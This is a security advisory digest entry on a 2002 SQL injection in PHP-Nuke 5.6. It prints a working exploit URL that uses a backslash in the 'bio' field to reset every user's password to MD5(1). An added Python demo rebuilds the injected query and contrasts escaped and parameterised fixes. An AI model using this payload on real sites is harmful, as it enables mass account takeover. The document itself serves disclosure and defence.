4th Nov 2002 [SBWID-5790]
COMMAND
PHP-Nuke SQL injection
SYSTEMS AFFECTED
PHP-Nuke 5.6
PROBLEM
From iDEFENSE Security Advisory [10.31.02c]
http://www.idefense.com/advisory/10.31.02c.txt
Credit goes to kill9 (kill9@hackers.com) for discovering this
vulnerability:
--snip--
PHP-Nuke is susceptible to an SQL injection attack that allows an
attacker to modify a user's table to his or her liking. It is possible
for any registered user of the target system to launch this attack by
feeding certain unfiltered characters to the account manager module.
The attacker can target a specific user or all system users at once.
The key is the ability to insert a backslash into the "bio" field,
thereby escaping a quote and leaving the SQL query open for injection.
The following example will modify every PHP-Nuke user's password to
"1":
Exploitation requires that the attacker log on, enter the account
manager and determine his or her UID through the source of the page. If
the attacker's UID is 2, he or she can then launch the attack by
requesting the following URL:
modules.php?name=Your_Account&op=saveuser&uid=2&bio=%5c&EditedMessage=no&pass=xxxxx&vpass=xxxxx&newsletter=,+bio=0,+pass=md5(1)/*
The injected query is constructed as follows:
UPDATE nuke_users
SET name = '',
email = '',
femail = '',
url = 'http://',
pass = 'xxxxx',
+--[ bio = '\',
| user_avatar = '',
| user_icq = '',
| user_occ = '',
| user_from = '',
| user_intrest = '',
| user_sig = '',
| user_aim = '',
| user_yim = '',
| user_msnm = '',
+--[ newsletter = ',
bio=0,pass=md5(1)/*' WHERE uid='2'
The marked area is all treated as a value to store into bio. The
"where" clause is commented out, leaving an update statement that
updates the entire table (i.e. all users) to having a password of
MD5(1).
--snap--
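The following Python is an added example, not code from iDEFENSE or from PHP-Nuke. It rebuilds the UPDATE statement quoted above from the advisory's own URL, scans it the way MySQL's parser would (backslash escapes the next character, '' inside a literal is an embedded quote, /* opens a comment) to show that the WHERE clause disappears, and then contrasts two fixes: escaping the values before concatenation (the addslashes-style fix, assumed here, not taken from the 6.0 source) and a parameterised query run against a small SQLite table constructed for the demo. The column order follows the advisory; the scanner, the escaping helper and the table are assumptions of this example.

```python
"""Added example, not code from iDEFENSE or PHP-Nuke: rebuilds the UPDATE
the advisory reconstructs, shows why the backslash in "bio" defeats the
quoting, and contrasts it with an escaped and a parameterised version."""
import sqlite3
from urllib.parse import parse_qs

# Query string from the advisory; parse_qs turns %5c into "\" and "+" into " ".
ADVISORY_QUERY_STRING = (
    "name=Your_Account&op=saveuser&uid=2&bio=%5c&EditedMessage=no"
    "&pass=xxxxx&vpass=xxxxx&newsletter=,+bio=0,+pass=md5(1)/*"
)

# Column order of the reconstructed statement in the advisory.
COLUMNS = ["name", "email", "femail", "url", "pass", "bio", "user_avatar",
           "user_icq", "user_occ", "user_from", "user_intrest", "user_sig",
           "user_aim", "user_yim", "user_msnm", "newsletter"]
DEFAULTS = {"url": "http://"}  # the advisory shows url = 'http://' when empty


def submitted_fields(query_string):
    """Return (column -> value, uid) as the account manager would see them."""
    params = parse_qs(query_string, keep_blank_values=True)
    params.pop("name", None)  # "name" in the URL selects the module, not the user's name column
    fields = {c: params.get(c, [DEFAULTS.get(c, "")])[0] for c in COLUMNS}
    return fields, params["uid"][0]


def mysql_escape(value):
    """Assumed fix: escape backslash and quote before concatenation
    (what PHP's addslashes() does)."""
    return value.replace("\\", "\\\\").replace("'", "\\'")


def build_update(fields, uid, escape=lambda v: v):
    """String-concatenated UPDATE as the advisory reconstructs it. With the
    identity `escape` this is the vulnerable form."""
    sets = ", ".join(f"{c} = '{escape(fields[c])}'" for c in COLUMNS)
    return f"UPDATE nuke_users SET {sets} WHERE uid='{escape(uid)}'"


def effective_sql(sql):
    """Collapse the statement to what MySQL's parser acts on: each single-quoted
    literal (backslash escapes the next char, '' is an embedded quote) becomes
    '?', and a /* comment runs to */ or to the end of the statement."""
    out, i, n = [], 0, len(sql)
    while i < n:
        ch = sql[i]
        if ch == "'":
            i += 1
            while i < n:
                if sql[i] == "\\":
                    i += 2
                elif sql[i] == "'" and i + 1 < n and sql[i + 1] == "'":
                    i += 2
                elif sql[i] == "'":
                    break
                else:
                    i += 1
            out.append("'?'")
            i += 1
        elif sql.startswith("/*", i):
            end = sql.find("*/", i + 2)
            i = n if end < 0 else end + 2
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def updates_every_row(sql):
    """True when no WHERE clause survives parsing."""
    return "WHERE" not in effective_sql(sql).upper()


def parameterised_update(fields, uid):
    """Preferred fix: placeholders, so the driver never interprets the values.
    Runs against an in-memory SQLite table constructed for this demo; the
    password hashing PHP-Nuke does before storing `pass` is omitted."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE nuke_users (uid INTEGER PRIMARY KEY, bio TEXT, "
               "pass TEXT, newsletter TEXT)")
    db.executemany("INSERT INTO nuke_users VALUES (?, ?, ?, ?)",
                   [(1, "admin bio", "adminhash", ""), (2, "old", "oldhash", "")])
    db.execute("UPDATE nuke_users SET bio = ?, pass = ?, newsletter = ? WHERE uid = ?",
               (fields["bio"], fields["pass"], fields["newsletter"], int(uid)))
    return {u: (bio, pw, nl) for u, bio, pw, nl in
            db.execute("SELECT uid, bio, pass, newsletter FROM nuke_users ORDER BY uid")}


if __name__ == "__main__":
    fields, uid = submitted_fields(ADVISORY_QUERY_STRING)
    print(effective_sql(build_update(fields, uid)))                 # no WHERE left
    print(effective_sql(build_update(fields, uid, mysql_escape)))   # WHERE survives
    print(parameterised_update(fields, uid))                        # only uid 2 changed
```

Running it prints the vulnerable statement collapsed to `... bio = '?', bio=0, pass=md5(1)` with the WHERE clause swallowed by the comment, the escaped variant still ending in `WHERE uid='?'`, and a row set in which only uid 2 changed and its bio is the single backslash it submitted.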
SOLUTION
Upgrade to PHP-Nuke version 6.0, which is not vulnerable to this SQL injection attack.